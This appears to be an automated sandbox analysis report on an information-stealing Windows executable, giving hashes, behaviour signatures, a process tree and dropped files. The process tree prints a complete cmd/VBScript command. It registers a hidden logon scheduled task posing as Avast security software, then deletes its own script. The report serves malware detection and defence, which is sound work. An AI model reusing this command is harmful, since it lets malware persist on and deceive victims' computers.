Overview

overview

8

Static

static

3909df1072...87.exe

windows7-x64

8

3909df1072...87.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    28s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    17/12/2022, 00:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3909df10728e9c01e57850894cf7d087.exe

  • Size

    74KB

  • MD5

    3909df10728e9c01e57850894cf7d087

  • SHA1

    9f1d3633974c6e6251507e92e5801456e30f91d1

  • SHA256

    2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014

  • SHA512

    9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d

  • SSDEEP

    1536:lefxEVTPl9cOchE2PySGSn95sSb8U5b543npeufE:l3TPLcOcZ78Sb8U5m3nEu8

Score
8/10
spywarestealer

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe
    "C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1292
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
        C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Avast corporation" : regInfo.Description="Avast security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("AvastSecurity", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:284
          • C:\Windows\system32\cscript.exe
            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs"
            5⤵
              PID:1380

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs
      Filesize

      1KB

      MD5

      d8655cf5570dfb2f06add1fafa516343

      SHA1

      4bc05ddf1577d6a2c32c60c6acb3901ae22acfe1

      SHA256

      a18cde5c98d72f935711a4f0497c376c3360c15580fcd67dc417e7a6b4efd6ef

      SHA512

      4e1451d95274effb47edb8dd04a569b8eb11df23fc0cc02453d26b14bf05bf20117e40145987b4f3500ae48d6e41788e5e5fe0feff0a60165f9060e5f0a4baf3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
      Filesize

      74KB

      MD5

      3909df10728e9c01e57850894cf7d087

      SHA1

      9f1d3633974c6e6251507e92e5801456e30f91d1

      SHA256

      2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014

      SHA512

      9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
      Filesize

      74KB

      MD5

      3909df10728e9c01e57850894cf7d087

      SHA1

      9f1d3633974c6e6251507e92e5801456e30f91d1

      SHA256

      2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014

      SHA512

      9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d

      Download Submit

    • memory/1292-54-0x0000000000AE0000-0x0000000000AF8000-memory.dmp

      Filesize

      96KB

      Download

    • memory/1292-55-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1996-60-0x0000000000D20000-0x0000000000D38000-memory.dmp

      Filesize

      96KB

      Download